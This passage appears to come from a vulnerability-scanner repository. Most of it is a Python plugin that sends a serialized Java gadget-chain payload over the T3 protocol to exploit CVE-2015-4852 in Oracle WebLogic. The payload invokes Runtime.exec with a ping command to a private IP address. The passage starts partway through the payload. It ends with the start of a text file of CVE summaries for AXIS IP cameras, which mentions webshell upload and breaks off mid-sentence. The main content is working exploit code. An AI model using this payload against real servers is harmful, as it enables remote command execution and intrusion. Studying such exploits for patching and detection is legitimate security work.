67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x75\x72\x00\x2d\x5b\x4c\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\xbd\x56\x2a\xf1\xd8\x34\x18\x99\x02\x00\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3b\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x6f\x6e\x73\x74\x61\x6e\x74\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x58\x76\x90\x11\x41\x02\xb1\x94\x02\x00\x01\x4c\x00\x09\x69\x43\x6f\x6e\x73\x74\x61\x6e\x74\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x78\x70\x76\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x52\x75\x6e\x74\x69\x6d\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c\xce\x38\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x0b\x69\x50\x61\x72\x61\x6d\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4d\x65\x74\x68\x6f\x64\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\xa0\xf0\xa4\x38\x7a\x3b\xb3\x42\x02\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1e\x73\x71\x00\x7e\x00\x16\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x02\x70\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x00\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1b\x73\x71\x00\x7e\x00\x16\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00\x19\x70\x69\x6e\x67\x20\x2d\x63\x20\x34\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x32\x35\x33\x2e\x31\x33\x30\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x01\x71\x00\x7e\x00\x23\x73\x71\x00\x7e\x00\x11\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70\x00\x00\x00\x01\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x76\x72\x00\x12\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x71\x00\x7e\x00\x3a" 30 | 31 | chunk3 = '\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78' 32 | 33 | totallength = len(chunk1) + len(chunk2) + len(chunk3) 34 | 35 | len_hex = hex(totallength) 36 | 37 | len_hex = len_hex.replace('0x', '0') 38 | 39 | s1 = len_hex[:2] 40 | s2 = len_hex[2:4] 41 | len_hex = unhexlify(s1 + s2) 42 | 43 | chunk1 = '\x00\x00' + len_hex + '\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00' 44 | 45 | payload = chunk1 + chunk2 + chunk3 46 | 47 | payload = "{0}{1}".format(struct.pack('!i', len(payload)), payload[4:]) 48 | 49 | sock.send(payload) 50 | response = sock.recv(15000) 51 | print(("[*]测试返回内容为{}".format(response))) 52 | except Exception as e: 53 | print("CVE_2015_4852脚本出错") 54 | if __name__ == '__main__': 55 | run('127.0.0.1',7001) -------------------------------------------------------------------------------- /plugins/CVE的原理分析网址处理脚本/temp.txt: -------------------------------------------------------------------------------- 1 | CVE-2018-9158 An issue was discovered on AXIS M1033-W (IP camera) Firmware version 5.40.5.1 devices. They don't employ a suitable mechanism to prevent a DoS attack, which leads to a response time delay. An attacker can use the hping3 tool to perform an IPv4 flood attack, and the services are interrupted from attack start to end. 2 | CVE-2018-9157 ** DISPUTED ** An issue was discovered on AXIS M1033-W (IP camera) Firmware version 5.40.5.1 devices. The upload web page doesn't verify the file type, and an attacker can upload a webshell by making a fileUpload.shtml request for a custom .shtml file, which is interpreted by the Apache HTTP Server mod_include module with "